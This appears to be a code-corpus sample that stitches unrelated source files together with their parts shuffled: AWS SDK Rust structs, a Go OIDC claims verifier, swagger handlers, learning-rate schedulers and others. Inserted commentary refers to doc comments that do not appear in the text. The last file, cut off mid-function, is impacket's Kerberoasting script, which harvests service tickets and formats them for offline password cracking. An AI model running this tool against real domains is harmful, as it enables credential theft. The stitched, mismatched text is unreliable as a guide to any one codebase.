fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteMetricStreamInput");
formatter.field("name", &self.name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteInsightRulesInput {
/// <p>An array of the rule names to delete. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteDashboardsInput {
/// <p>The dashboards to be deleted. This parameter is required.</p>
pub dashboard_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteDashboardsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteDashboardsInput");
formatter.field("dashboard_names", &self.dashboard_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteAnomalyDetectorInput {
/// <p>The namespace associated with the anomaly detection model to delete.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The metric name associated with the anomaly detection model to delete.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The metric dimensions associated with the anomaly detection model to delete.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The statistic associated with the anomaly detection model to delete.</p>
pub stat: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DeleteAnomalyDetectorInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteAnomalyDetectorInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("stat", &self.stat);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteAlarmsInput {
/// <p>The alarms to be deleted.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteAlarmsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteAlarmsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
} | |
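The StartTime rounding rules repeated in the GetMetricStatistics and GetMetricData doc comments above are easy to misread, so here is a minimal sketch of them as executable logic. This is plain illustrative Python, not part of the generated SDK; CloudWatch applies this rounding server-side, and only the 15-day and 63-day bracket boundaries are taken from the doc comments.
from datetime import datetime, timedelta, timezone

def round_start_time(start: datetime, now: datetime) -> datetime:
    # < 15 days ago: round down to the whole minute; 15-63 days ago: to the
    # 5-minute interval; > 63 days ago: to the hour (per the docs above).
    age = now - start
    if age < timedelta(days=15):
        step = 60
    elif age < timedelta(days=63):
        step = 300
    else:
        step = 3600
    epoch = int(start.timestamp())
    return datetime.fromtimestamp(epoch - epoch % step, tz=timezone.utc)

now = datetime(2021, 6, 1, 12, 32, 34, tzinfo=timezone.utc)
print(round_start_time(now - timedelta(days=1), now))   # ...12:32:00 (minute)
print(round_start_time(now - timedelta(days=30), now))  # ...12:30:00 (5 min)
print(round_start_time(now - timedelta(days=90), now))  # ...12:00:00 (hour)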
seasonal.rs | //! Module for seasonal stats.
mod match_result;
mod rank;
mod season;
pub use self::match_result::MatchResult;
pub use self::rank::Rank;
pub use self::season::Season;
use crate::internals::utils::serde_parse_f64_option;
use crate::region::Region;
use chrono::{DateTime, NaiveDate, Utc};
use int_enum::IntEnum;
use serde::{Deserialize, Deserializer};
use std::collections::HashMap;
/// Deserialized seasonal stats.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct SeasonalStats {
pub username: String,
pub platform: String,
pub ubisoft_id: String,
pub uplay_id: Option<String>,
pub avatar_url_146: Option<String>,
pub avatar_url_256: Option<String>,
pub last_updated: DateTime<Utc>,
pub seasons: HashMap<Season, SeasonInfo>,
}
/// Deserialized season info.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct SeasonInfo {
pub name: String,
pub start_date: DateTime<Utc>,
pub end_date: Option<NaiveDate>,
pub regions: HashMap<Region, Vec<RegionInfo>>,
}
/// Deserialized region info.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct RegionInfo {
#[serde(rename = "season_id")]
#[serde(deserialize_with = "deserialize_season")]
pub season: Season,
pub region: String,
pub abandons: u16,
pub losses: u16,
pub max_mmr: f32,
pub max_rank: Rank,
pub mmr: f32,
pub next_rank_mmr: f32,
pub prev_rank_mmr: f32,
pub rank: Rank,
pub skill_mean: f32,
pub skill_standard_deviation: f32,
pub created_for_date: DateTime<Utc>,
pub wins: u16,
pub kills: Option<u16>,
pub deaths: Option<u16>,
pub last_match_mmr_change: Option<i16>,
// The endpoint returns a string for this field
#[serde(deserialize_with = "serde_parse_f64_option")]
pub last_match_skill_mean_change: Option<f64>,
// The endpoint returns a string for this field
#[serde(deserialize_with = "serde_parse_f64_option")]
pub last_match_skill_standard_deviation_change: Option<f64>,
pub last_match_result: Option<MatchResult>,
pub champions_rank_position: Option<u16>,
pub rank_text: String,
pub rank_image: String,
pub max_rank_text: String,
pub max_rank_image: String,
}
fn deserialize_season<'de, D: Deserializer<'de>>(deserializer: D) -> Result<Season, D::Error> {
let id = u8::deserialize(deserializer)?;
Season::from_int(id).map_err(serde::de::Error::custom)
} | ||
reacher.py | import numpy as np
class StaticFns:
@staticmethod
def termination_fn(obs, act, next_obs):
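        # Reacher has no early-termination condition, so this returns an
        # all-False array shaped (batch_size, 1), one entry per observation.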
done = np.array([False]).repeat(len(obs))
        done = done[:, None] | return done
|
oidc_verify.go | /* | Use of this software is governed by the Business Source License included in
the file licenses/BSL-Couchbase.txt. As of the Change Date specified in that
file, in accordance with the Business Source License, use of this software will
be governed by the Apache License, Version 2.0, included in the file
licenses/APL2.txt.
*/
package auth
import (
"bytes"
"encoding/base64"
"encoding/json"
"errors"
"fmt"
"github.com/coreos/go-oidc"
"strings"
"time"
"github.com/couchbase/sync_gateway/base"
pkgerrors "github.com/pkg/errors"
)
const (
issuerGoogleAccounts = "https://accounts.google.com"
issuerGoogleAccountsNoScheme = "accounts.google.com"
)
// Identity claims required for claims verification
type Identity struct {
Issuer string
Audience []string
Subject string
Expiry time.Time
IssuedAt time.Time
Email string
Claims map[string]interface{}
}
type IdentityJson struct {
Issuer string `json:"iss"`
Subject string `json:"sub"`
Audience audience `json:"aud"`
Expiry jsonTime `json:"exp"`
IssuedAt jsonTime `json:"iat"`
NotBefore *jsonTime `json:"nbf"`
Email string `json:"email"`
Claims map[string]interface{} `json:"-"`
}
// UnmarshalIdentityJSON unmarshals raw claim bytes into an IdentityJson.
func UnmarshalIdentityJSON(claims []byte) (*IdentityJson, error) {
	if len(claims) == 0 {
return nil, errors.New("can't extract identity claims from an empty byte slice")
}
identity := IdentityJson{}
if err := json.Unmarshal(claims, &identity); err != nil {
return nil, err
}
decoder := base.JSONDecoder(bytes.NewReader(claims))
decoder.UseNumber()
if err := decoder.Decode(&identity.Claims); err != nil {
return nil, err
}
delete(identity.Claims, "iss")
delete(identity.Claims, "sub")
delete(identity.Claims, "aud")
delete(identity.Claims, "exp")
delete(identity.Claims, "iat")
delete(identity.Claims, "nbf")
delete(identity.Claims, "email")
return &identity, nil
}
// VerifyClaims parses a raw ID Token and verifies the claim.
func VerifyClaims(rawIDToken, clientID, issuer string) (*Identity, error) {
payload, err := parseJWT(rawIDToken)
if err != nil {
return nil, fmt.Errorf("oidc: malformed jwt: %v", err)
}
identityJson, err := UnmarshalIdentityJSON(payload)
if err != nil {
return nil, fmt.Errorf("oidc: failed to unmarshal claims: %v", err)
}
identity := &Identity{
Issuer: identityJson.Issuer,
Subject: identityJson.Subject,
Audience: []string(identityJson.Audience),
Expiry: time.Time(identityJson.Expiry),
IssuedAt: time.Time(identityJson.IssuedAt),
Email: identityJson.Email,
Claims: identityJson.Claims,
}
// Check issuer. Google sometimes returns "accounts.google.com" as the issuer claim instead of the required
// "https://accounts.google.com". Detect this case and allow it only for Google. We will not add hooks to let
// other providers go off spec like this.
if (identity.Issuer != issuer) && !(issuer == issuerGoogleAccounts && identity.Issuer == issuerGoogleAccountsNoScheme) {
return nil, fmt.Errorf("oidc: id token issued by a different provider, expected %q got %q", issuer, identity.Issuer)
}
// Provided client ID must be part of the audience.
if !base.ContainsString(identity.Audience, clientID) {
return nil, fmt.Errorf("oidc: expected audience %q got %q", clientID, identity.Audience)
}
// Make sure token is not expired.
now := time.Now()
if identity.Expiry.Before(now) {
return nil, fmt.Errorf("oidc: token is expired (Token Expiry: %v)", identity.Expiry)
}
// If nbf claim is provided in token, ensure that it is indeed in the past.
if identityJson.NotBefore != nil {
nbfTime := time.Time(*identityJson.NotBefore)
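		// Tolerate up to one minute of clock skew between this host and the token issuer.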
leeway := 1 * time.Minute
if now.Add(leeway).Before(nbfTime) {
return nil, fmt.Errorf("oidc: current time %v before the nbf (not before) time: %v", now, nbfTime)
}
}
return identity, nil
}
func parseJWT(p string) ([]byte, error) {
parts := strings.Split(p, ".")
if len(parts) < 2 {
return nil, fmt.Errorf("oidc: malformed jwt, expected 3 parts got %d", len(parts))
}
payload, err := base64.RawURLEncoding.DecodeString(parts[1])
if err != nil {
return nil, fmt.Errorf("oidc: malformed jwt payload: %v", err)
}
return payload, nil
}
type audience []string
func (a *audience) UnmarshalJSON(b []byte) error {
var s string
if json.Unmarshal(b, &s) == nil {
*a = audience{s}
return nil
}
var auds []string
if err := json.Unmarshal(b, &auds); err != nil {
return err
}
*a = audience(auds)
return nil
}
type jsonTime time.Time
func (j *jsonTime) UnmarshalJSON(b []byte) error {
var n json.Number
if err := json.Unmarshal(b, &n); err != nil {
return err
}
var unix int64
if t, err := n.Int64(); err == nil {
unix = t
} else {
f, err := n.Float64()
if err != nil {
return err
}
unix = int64(f)
}
*j = jsonTime(time.Unix(unix, 0))
return nil
}
// getIdentity returns identity claims extracted from an ID token.
func getIdentity(idToken *oidc.IDToken) (identity *Identity, ok bool, identityErr error) {
if idToken == nil {
return nil, false, errors.New("can't extract identity claims from a nil token")
}
identity = &Identity{
Issuer: idToken.Issuer,
Audience: idToken.Audience,
Subject: idToken.Subject,
Expiry: idToken.Expiry,
IssuedAt: idToken.IssuedAt,
}
claims := map[string]interface{}{}
if err := idToken.Claims(&claims); err != nil {
identityErr = pkgerrors.Wrap(err, "failed to extract identity claims from token")
}
identity.Claims = claims
if claim, found := claims["email"]; found {
var ok bool
if identity.Email, ok = claim.(string); !ok {
return identity, true, fmt.Errorf("oidc: can't cast claim %q as string", "email")
}
}
return identity, true, identityErr
} | Copyright 2020-Present Couchbase, Inc.
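For readers less familiar with Go, a rough Python equivalent of the checks VerifyClaims performs. This is illustrative only; error handling, the audience/nbf edge cases, and the leeway logic are simplified.
import base64, json, time

def verify_claims(raw_id_token, client_id, issuer):
    parts = raw_id_token.split(".")
    if len(parts) < 2:
        raise ValueError("malformed jwt")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64url padding
    claims = json.loads(base64.urlsafe_b64decode(payload))
    aud = claims["aud"] if isinstance(claims["aud"], list) else [claims["aud"]]
    # Same Google-only issuer exception as the Go code above.
    if claims["iss"] != issuer and not (
        issuer == "https://accounts.google.com"
        and claims["iss"] == "accounts.google.com"
    ):
        raise ValueError("unexpected issuer")
    if client_id not in aud:
        raise ValueError("unexpected audience")
    if claims["exp"] < time.time():
        raise ValueError("token expired")
    return claims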
|
delete_api_v1_games_game_id_responses.go | // Code generated by go-swagger; DO NOT EDIT.
package operations
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the swagger generate command
import (
"net/http"
"github.com/go-openapi/runtime"
)
// DeleteAPIV1GamesGameIDOKCode is the HTTP code returned for type DeleteAPIV1GamesGameIDOK
const DeleteAPIV1GamesGameIDOKCode int = 200
/*DeleteAPIV1GamesGameIDOK Game successfully deleted
swagger:response deleteApiV1GamesGameIdOK
*/ | }
// NewDeleteAPIV1GamesGameIDOK creates DeleteAPIV1GamesGameIDOK with default headers values
func NewDeleteAPIV1GamesGameIDOK() *DeleteAPIV1GamesGameIDOK {
return &DeleteAPIV1GamesGameIDOK{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(200)
}
// DeleteAPIV1GamesGameIDBadRequestCode is the HTTP code returned for type DeleteAPIV1GamesGameIDBadRequest
const DeleteAPIV1GamesGameIDBadRequestCode int = 400
/*DeleteAPIV1GamesGameIDBadRequest Bad request
swagger:response deleteApiV1GamesGameIdBadRequest
*/
type DeleteAPIV1GamesGameIDBadRequest struct {
}
// NewDeleteAPIV1GamesGameIDBadRequest creates DeleteAPIV1GamesGameIDBadRequest with default headers values
func NewDeleteAPIV1GamesGameIDBadRequest() *DeleteAPIV1GamesGameIDBadRequest {
return &DeleteAPIV1GamesGameIDBadRequest{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(400)
}
// DeleteAPIV1GamesGameIDNotFoundCode is the HTTP code returned for type DeleteAPIV1GamesGameIDNotFound
const DeleteAPIV1GamesGameIDNotFoundCode int = 404
/*DeleteAPIV1GamesGameIDNotFound Resource not found
swagger:response deleteApiV1GamesGameIdNotFound
*/
type DeleteAPIV1GamesGameIDNotFound struct {
}
// NewDeleteAPIV1GamesGameIDNotFound creates DeleteAPIV1GamesGameIDNotFound with default headers values
func NewDeleteAPIV1GamesGameIDNotFound() *DeleteAPIV1GamesGameIDNotFound {
return &DeleteAPIV1GamesGameIDNotFound{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDNotFound) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(404)
}
// DeleteAPIV1GamesGameIDInternalServerErrorCode is the HTTP code returned for type DeleteAPIV1GamesGameIDInternalServerError
const DeleteAPIV1GamesGameIDInternalServerErrorCode int = 500
/*DeleteAPIV1GamesGameIDInternalServerError Internal server error
swagger:response deleteApiV1GamesGameIdInternalServerError
*/
type DeleteAPIV1GamesGameIDInternalServerError struct {
}
// NewDeleteAPIV1GamesGameIDInternalServerError creates DeleteAPIV1GamesGameIDInternalServerError with default headers values
func NewDeleteAPIV1GamesGameIDInternalServerError() *DeleteAPIV1GamesGameIDInternalServerError {
return &DeleteAPIV1GamesGameIDInternalServerError{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDInternalServerError) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(500)
} | type DeleteAPIV1GamesGameIDOK struct { |
images.js | // eslint-disable-next-line no-undef
const express = require("express");
// create new router
const router = express.Router(); | // eslint-disable-next-line no-undef
const images_controller = require("../controllers/imagesController");
router.post("/upload/product/:id", images_controller.upload_image);
router.get("/remove/product/:id", images_controller.remove_image);
router.get("/show/product/:id", images_controller.show_image);
router.get("/", images_controller.all_images);
// eslint-disable-next-line no-undef
module.exports = router; | |
SchmoeJoe.tsx | import React from 'react';
import styles from './Schmoe.module.scss';
export default function SchmoeJoe({ style }: { style?: React.CSSProperties }) {
return (
<div style={style} className={styles.schmoe}>
<img
className="Schmoe__character"
alt="Joe Schmoe illustration"
src="https://d3tycb976jpudc.cloudfront.net/schmoes/joe.svg"
/>
<img
width="325"
className="Schmoe__thought"
alt="Wow! Nu ma asteptam sa-mi placa asa mult" | src="/images/landing/characters/Schmoe_2.png"
/>
</div>
);
} | style={{ transform: 'translate(0px, 20px)' }} |
index.ts | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License.
*/
import { RouteDependencies } from '../types';
import {
registerGetRoutes,
registerCreateRoute,
registerUpdateRoute,
registerPrivilegesRoute,
registerDeleteRoute,
registerSimulateRoute,
} from './api';
export class | {
setup(dependencies: RouteDependencies) {
registerGetRoutes(dependencies);
registerCreateRoute(dependencies);
registerUpdateRoute(dependencies);
registerPrivilegesRoute(dependencies);
registerDeleteRoute(dependencies);
registerSimulateRoute(dependencies);
}
}
| ApiRoutes |
LearningRate_Decay.py | import math
import numpy as np
#1.
class LR_LinearDecay():
'''
    Function : -Learning rate decays linearly (by a constant amount) after each epoch
               -Eg. LR = 5.0, 4.8, 4.6, 4.4, ...
'''
def __init__(self, min_lr=1e-5, max_lr=1e-2, epochs=None):
super().__init__()
self.min_lr = min_lr
self.max_lr = max_lr
self.total_iterations = epochs
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
self.iteration = epoch_i
x = self.iteration / self.total_iterations
return self.max_lr - (self.max_lr-self.min_lr) * x
#2.
class LR_StepDecay():
'''
    Function : -Learning rate decays stepwise (by a constant factor every `step_size` epochs)
- Eg. LR= 5, 5, 5, 2.5, 2.5, 2.5, 1.25, 1.25, 1.25, ......
'''
def __init__(self, max_lr=1e-2, step_size=3, decay_factor=2):
super().__init__()
self.max_lr = max_lr
self.step_size = step_size # meaning: update happens after every `step_size` iterations
self.decay_factor = decay_factor
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
self.iteration = epoch_i
x = self.iteration / self.step_size
return self.max_lr / (self.decay_factor ** int(x) )
#3.
class LR_ExponentialDecay():
'''
    Function : Learning rate decays exponentially ( max_lr / exp(k*t) ) after each epoch
'''
def __init__(self, max_lr=1e-2, decay_factor=0.1):
super().__init__()
self.max_lr = max_lr
self.decay_factor = decay_factor
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
return self.max_lr / math.exp(self.decay_factor*epoch_i )
#4.
class LR_Cyclical():
'''
Function - This implements 2 techniques: 1.Linear annealing(to better converge at minima)
2.Learning rate linear restart(to escape local minima)
'''
def __init__(self, min_lr=1e-5, max_lr=1e-2, step_size=10, mode='triangular', gamma=1., scale_fn=None, scale_mode='cycle'):
        super().__init__()
self.min_lr = min_lr
self.max_lr = max_lr
self.step_size = step_size
self.mode = mode
        if scale_fn is None:
if(self.mode == 'triangular'):
self.scale_fn = lambda x: 1.
elif(self.mode == 'triangular2'):
self.scale_fn = lambda x: 1/(2.**(x-1))
elif(self.mode == 'exp_range'):
self.scale_fn = lambda x: gamma**(x)
else:
self.scale_fn = scale_fn
def get_lr(self, epoch_i):
cycle = math.floor(1 + epoch_i/(2*self.step_size))
        x = abs(epoch_i/self.step_size - 2*cycle + 1)
        return self.min_lr + (self.max_lr-self.min_lr) * (1-x) * self.scale_fn(cycle)
#5.
class LR_StochasticGradientDescentWithWarmRestarts():
'''
Function - This implements 2 techniques: 1.Cosine annealing(to better converge at minima)
2.Learning rate sharp restart(to escape local minima)
'''
def __init__(self, min_lr, max_lr, epoch_steps=10):
self.min_lr = min_lr
self.max_lr = max_lr
|
self.epoch_steps = epoch_steps # restarts after every `epoch_steps` no. of epochs
self.batch_since_restart = 0
def get_lr(self, epoch_i):
'''Calculate the learning rate.'''
        self.batch_since_restart = epoch_i % self.epoch_steps
        fraction_to_restart = self.batch_since_restart / self.epoch_steps
return self.min_lr + 0.5 * (self.max_lr - self.min_lr) * (1 + np.cos(fraction_to_restart * np.pi))
'''
Example.
>> epoch_n = 50
>> lr = LR_LinearDecay(epochs = epoch_n)
>> for epoch_i in range(1,epoch_n+1):
learning_rate = lr.get_lr(epoch_i = epoch_i )
''' | |
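A quick sanity check (illustrative; it assumes the classes above are in scope) that LR_StepDecay reproduces the pattern claimed in its docstring:
lr = LR_StepDecay(max_lr=5.0, step_size=3, decay_factor=2)
print([lr.get_lr(epoch_i) for epoch_i in range(9)])
# -> [5.0, 5.0, 5.0, 2.5, 2.5, 2.5, 1.25, 1.25, 1.25]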
spec.py | #!/usr/bin/env python3 | #
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""OpenAPI generator."""
from apispec import APISpec
from flask import current_app
from reana_job_controller.schemas import Job, JobRequest
def build_openapi_spec():
"""Create OpenAPI definition."""
spec = APISpec(
title='reana-job-controller',
version='0.4.0',
info=dict(
description='REANA Job Controller API'
),
plugins=[
'apispec.ext.flask',
'apispec.ext.marshmallow',
]
)
# Add marshmallow models to specification
spec.definition('Job', schema=Job)
spec.definition('JobRequest', schema=JobRequest)
# Collect OpenAPI docstrings from Flask endpoints
for key in current_app.view_functions:
if key != 'static' and key != 'get_openapi_spec':
spec.add_path(view=current_app.view_functions[key])
return spec.to_dict() | # -*- coding: utf-8 -*- |
GetUserSPNs.py | #!/usr/bin/python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module will try to find Service Principal Names that are associated with normal user account.
# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
#
# ToDo:
# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
# [ ] Improve the search filter, we have to specify we don't want machine accounts in the answer
# (play with userAccountControl)
#
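# Output format: outputTGS below emits tickets in the JtR/hashcat "krb5tgs"
# format (hashcat mode 13100), e.g. (illustrative values only):
#   $krb5tgs$23$*user$DOMAIN.LOCAL$svc/host*$<16-byte checksum hex>$<ticket hex>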
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print outputFormat.format(*header)
print ' '.join(['-' * itemLen for itemLen in colLen])
# And now the rows
for row in items:
print outputFormat.format(*row)
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = options.outputfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = None
self.__requestTGS = options.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
logging.debug('Error while anonymous logging into %s' % self.__domain)
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
return TGT
else:
logging.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
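# For etype 23 (RC4-HMAC) the entry printed below has the form:
# $krb5tgs$23$*user$REALM$spn*$<16-byte checksum hex>$<remaining cipher hex>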
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
if fd is None:
print entry
else:
fd.write(entry+'\n')
else:
logging.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
# Save the ticket
logging.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception, e:
logging.error(str(e))
def run(self):
if self.__doKerberos:
self.__target = self.getMachineName()
else:
if self.__kdcHost is not None:
self.__target = self.__kdcHost
else:
self.__target = self.__domain
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError, e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
raise
# Building the following filter:
# (&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
# (servicePrincipalName=*)
and0 = ldapasn1.Filter()
and0['present'] = ldapasn1.Present('servicePrincipalName')
# (UserAccountControl:1.2.840.113556.1.4.803:=512)
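# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule; 512 is UF_NORMAL_ACCOUNT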
and1 = ldapasn1.Filter()
and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
and1['extensibleMatch']['dnAttributes'] = False
# !(UserAccountControl:1.2.840.113556.1.4.803:=2)
and2 = ldapasn1.Not()
and2['notFilter'] = ldapasn1.Filter()
and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
and2['notFilter']['extensibleMatch']['dnAttributes'] = False
searchFilter = ldapasn1.Filter()
searchFilter['and'] = ldapasn1.And()
searchFilter['and'][0] = and0
searchFilter['and'][1] = and1
# searchFilter['and'][2] = and2
